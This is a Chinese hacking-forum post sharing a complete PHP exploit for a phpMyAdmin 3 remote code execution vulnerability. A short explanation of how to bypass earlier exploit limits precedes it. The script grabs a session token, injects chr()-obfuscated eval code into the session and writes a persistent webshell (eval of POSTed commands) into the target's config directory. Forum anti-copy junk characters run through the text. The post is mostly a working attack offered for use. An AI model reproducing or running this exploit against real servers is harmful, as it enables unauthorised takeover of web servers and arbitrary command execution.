中国网络渗透测试联盟

标题: phpadmin3 remote code execute php版本exploit [打印本页]
作者: admin    时间: 2013-2-21 09:13
标题: phpadmin3 remote code execute php版本exploit
最近在家做专职奶爸,不谙圈内事很多months了,博客也无更新。. A' m$ e! ^7 N

: U- D- `; a/ z  k昨夜带孩子整夜未眠,看到黑哥在php security群里关于phpmyadmin3漏洞的讨论,虽然之前没看过漏洞代码,不过前段时间还是在微博上看到wofeiwo的exp了,不过据黑哥说有不鸡肋的利用方法,于是夜里翻代码出来研究了翻,写出了这个冷饭exp,由于我搞的晚了,之前已经很多人研究了写exp了,于是我这个属于炒冷饭,权当研究研究打发时间了。, c) p9 l6 C$ I
0 V* z  O% f0 v# q4 f9 z
首先赞下wofeiwo的python版本的exp,再赞下wofeiwo跟superhei的钻研精神,学习的榜样啊。不过之前那个exp利用起来是有一些限制的:$ r6 p: }& B) R
一是session.auto_start = 1;
- J3 r- |5 l3 y7 X0 O( w二是pma3默认代码里libraries目录已经用.htaccess控制了不允许访问。5 n3 w- k: r( P/ g; u! c
当然还有第三点大家都不可以逾越的鸿沟:config目录存在且可写。  X! |" u' |/ w  ~
# _3 g$ g6 @9 T
在群里看了黑哥的发言后,再看了下代码,发现前两点利用限制均可以无视。所以其实这个漏洞还真的可以不是那么鸡肋。
% L% c7 x/ P5 j- |( S: P- v& Q% z- ~' U
于是写了这个php版本的exp,代码如下:( X6 W: D2 O! I' q  T
5 h  E- Y% d" f2 c
#!/usr/bin/php) |5 W+ |4 V% O3 N) F, O
<?php2 Q! I4 |! }  F2 R& i7 _) ^6 V
print_r('  o7 P/ [4 i$ p9 i
+---------------------------------------------------------------------------+' Q. e/ J3 ^) r) _+ X7 u9 o
pma3 - phpMyAdmin3 remote code execute exploit [Not jilei(chicken\'s ribs)]
% f1 \9 O2 E0 s4 h4 Xby oldjun(www.oldjun.com)/ [; s# |, Z/ v9 U: c$ C3 W, f
welcome to www.t00ls.net, ]$ a+ r& H7 u1 g, C8 A! H3 @
mail: oldjun@gmail.com% O7 i  u  G6 a( M5 O4 h
Assigned CVE id: CVE-2011-25059 n& d4 J7 a; L+ m+ B4 R
+---------------------------------------------------------------------------+
) m! o* G$ V( w; O8 n. D');
# D& k: J6 j; ^/ b. T( l, N; ~! v8 L- Z( ?/ h  m: x3 z
/**
6 E6 P$ r* G" s5 B5 g; O * working when the directory:"config" exists and is writeable.' Y& p; r1 r  o, v- I- B' O
**/4 l5 H. U! |! O9 X4 t
& r7 b- j* R5 P' h  C
if ($argc < 3) {
* u% E6 x5 V" q    print_r('
) G: @  V6 x% Y+ A  ]: ]2 q+---------------------------------------------------------------------------+
7 Y4 h$ v  b* p! C7 fUsage: php '.$argv[0].' host path& i9 W, ^% P" u5 \6 \
host:      target server (ip/hostname)
( O$ i, h) g7 C  ^path:      path to pma3
/ A0 F3 [3 v4 |& x# z9 P- T2 xExample:
! J. ]5 H- R9 P) T; O. L/ ]) |php '.$argv[0].' localhost /pma/
1 e6 R5 R1 H, j: \$ B" Q4 _+---------------------------------------------------------------------------+
6 `$ A+ t( g; `2 q: S');$ K9 a/ K/ d6 @6 A: W
    exit;& |3 z9 T: J; s( I# p% X$ Q) g
}
' g/ E' O) a2 u6 @  _! @% {& F# n: }
$host = $argv[1];8 q! T8 u3 j( ~* V" n/ S3 V
$path = $argv[2];
0 U- w6 V% _% N) Q9 H1 W3 G3 y6 F, T8 M
/**9 P  i! z" e: n/ [
* Try to determine if the directory:"config" exists
& @, k+ i8 E/ F  g' h**/  p2 t0 h9 M7 b) [' n6 a. _0 n# x
echo "[+] Try to determine if the directory:config exists....\n";
# r- \% a  v: x6 Q$returnstr=php_request('config/');; `; \+ F$ \. f% G
if(strpos($returnstr,'404')){# Q2 l, N6 r* d9 `: b. @
    exit("[-] Exploit Failed! The directory:config do not exists!\n");2 f( g6 p. m* Q6 h, F9 Y
}; C# E9 \8 L( o; _  f/ i

% M6 E- i7 w- |% _: \) O* p# M/**
* p) V) }/ x+ z# l5 T# R$ g) Z * Try to get token and sessionid1 n% _6 `' y' v) G0 S' y- K' J
**/
! F% ~+ b9 s0 |( W# qecho "[+] Try to get token and sessionid....\n";
2 w) f" m+ T/ ^" C$result=php_request('index.php');5 Y' s9 y, L' j) M" i5 B
preg_match('/phpMyAdmin=(\w{32,40})\;(.*?)token=(\w{32})\&/s', $result, $resp);; x- j8 ?! V2 a8 s: D: e# i
$token=$resp[3];: V# o5 Y- H$ L
$sessionid=$resp[1];
( H  [5 p: ^* W/ uif($token && $sessionid){
. Q1 l1 V  X; V- d: C& ]. S    echo "[+] tokentoken\n";
. z$ m* ~" Q  N2 R: V% H$ T: y    echo "[+] Session IDsessionid\n";* J( \( R  ~: r8 C; H: C. n5 a
}else{6 b6 G) Y# X* Q6 R) x# m4 Z; T
    exit("[-] Can't get token and Session ID,Exploit Failed!\n");
" T3 }- O1 w: q1 A1 g" F}( N5 `5 A4 ?7 D0 b/ Q7 z

) a+ Q  ^6 Y$ B* ?% q/**0 t) N0 g" j  F7 j3 ?4 g$ C
* Try to insert shell into session5 C) H5 s/ {; s' G; _* |! p
**/
8 A+ x! P$ \& S2 Y! _/ necho "[+] Try to insert shell into session....\n";
; F; \1 E  o% i5 G, m- ~& ophp_request('db_create.php?token='.$token.'&session_to_unset=t00ls&_SESSION[ConfigFile][Servers][*/eval(chr(102).chr(112).chr(117).chr(116).chr(115).chr(40).chr(102).chr(111).chr(112).chr(101).chr(110).chr(40).chr(39).chr(97).chr(46).chr(112).chr(104).chr(112).chr(39).chr(44).chr(39).chr(119).chr(39).chr(41).chr(44).chr(39).chr(60).chr(63).chr(112).chr(104).chr(112).chr(32).chr(101).chr(118).chr(97).chr(108).chr(40).chr(36).chr(95).chr(80).chr(79).chr(83).chr(84).chr(91).chr(99).chr(109).chr(100).chr(93).chr(41).chr(63).chr(62).chr(39).chr(41).chr(59).chr(101).chr(99).chr(104).chr(111).chr(40).chr(39).chr(116).chr(48).chr(48).chr(108).chr(115).chr(39).chr(41).chr(59));/*][host]=t00ls.net','','phpMyAdmin='.$sessionid);//Actually,almost all the php files in home directory of pma3 can be used here.
7 f  X3 d; \6 M
8 N+ e! j* F; O' t7 J* w# t! Q  T/**
7 y4 }* [2 _+ y) L- d * Try to create webshell
* b5 s4 }" v* Q/ A**// ~) h8 f! S' w8 W
echo "[+] Try to create webshell....\n";5 `9 {3 P8 v/ _6 \4 x
php_request('setup/config.php','phpMyAdmin='.$sessionid.'&tab_hash=&token='.$token.'&check_page_refresh=&DefaultLang=en&ServerDefault=0&eol=unix&submit_save=Save','phpMyAdmin='.$sessionid);
0 ~9 `4 Z9 _& L7 N/**
6 [4 X( D# M1 J* [2 V/ F * Try to check if the webshell was created successfully
$ ?1 r. V. B# X0 U**/. Y2 l( ^' a# x8 |' Z8 s
echo "[+] Try to check if the webshell was created successfully....\n";& k, v5 C9 U6 B/ b7 F" z4 T8 O9 @
$content=php_request('config/config.inc.php');; ?; V2 |8 g" L5 i
if(strpos($content,'t00ls')){
3 I- W- B/ g0 Z2 C    echo "[+] Congratulations! Expoilt successfully....\n";
, v( _% J: l3 o    echo "[+] Webshell:http://$host{$path}config/a.php eval(\$_POST[cmd])\n";
6 g4 n1 P: ~, w) r2 H9 C" H/ b) q% w}else{
& ]6 F* V7 U( R5 P    exit("[-] Exploit Failed! Perhaps the directory:config do not exists or is not writeable!\n");0 ?7 V% w) L% v. z: D! `
}
- G8 w& s7 W4 `9 V# k
7 R' i' x# ?8 R  _9 g* o; gfunction php_request($url,$data='',$cookie=''){. X/ O7 U3 x5 U3 _$ t
    global  $host, $path;
9 {( O2 R4 |, u! H6 d; M7 z6 g6 e7 }   
% ^- E3 L1 x4 z( r0 ^* t    $method=$data?'POST':'GET';
7 R5 X6 |& f8 ]6 _7 h   
! V! v8 J2 c, i2 R: j% r    $packet = $method." ".$path.$url." HTTP/1.1\r\n";
9 [  v% {2 X0 Q: J: N    $packet .= "Accept: */*\r\n";7 X5 Y6 f# Y2 \6 |% i/ D
    $packet .= "User-Agent: Mozilla/4.0 (compatible; MSIE 6.00; Windows NT 5.1; SV1)\r\n";
. X5 L) i  H4 T$ R$ W8 _, h  I    $packet .= "Host: $host\r\n";* T- \5 E7 \: r' a  d! N
    $packet .= $data?"Content-Type: application/x-www-form-urlencoded\r\n":"";1 k1 I) D: ]8 f3 q" x
    $packet .= $data?"Content-Length: ".strlen($data)."\r\n":"";
' O2 K& u' Z- n5 _: i6 [7 Z7 w    $packet .= $cookie?"Cookie: $cookie\r\n":"";) |% _) H$ O3 m( p2 @
    $packet .= "Connection: Close\r\n\r\n";8 K) S! L1 ~: K6 ]9 k" K
    $packet .= $data?$data:"";  G, N" \# I5 G3 B  C

5 Z, G6 y) Y7 |. _; D' p/ e    $fp = fsockopen(gethostbyname($host), 80);, X8 N2 g' i- `. q
    if (!$fp) {+ j3 O/ W* x+ K$ b8 a
    echo 'No response from '.$host; die;$ E# j2 a& l/ [5 t4 F5 x
    }
$ Y  u' A/ f6 Y    fputs($fp, $packet);7 ~" {% Z* `9 X4 \* a7 V3 v

6 h" t9 g& D' F! L& @; i    $resp = '';
1 \' g/ K& S! b9 K4 _9 z* \3 Z
, u, c* e! T, a# `; S: v2 A0 }    while ($fp && !feof($fp))
, G6 l+ [, E$ P6 ?( \6 j6 F        $resp .= fread($fp, 1024);, |; I% j- F8 `% [- m+ X' p
7 R( K' ^! L) q8 W0 o
    return $resp;/ }9 l6 I% T# R/ W" k, R
}# @0 V: G8 b* a- V* i+ U
   
1 I  _  u6 ~0 A?>
, v3 S9 j/ W; {! Z( S- c.



欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/) Powered by Discuz! X3.2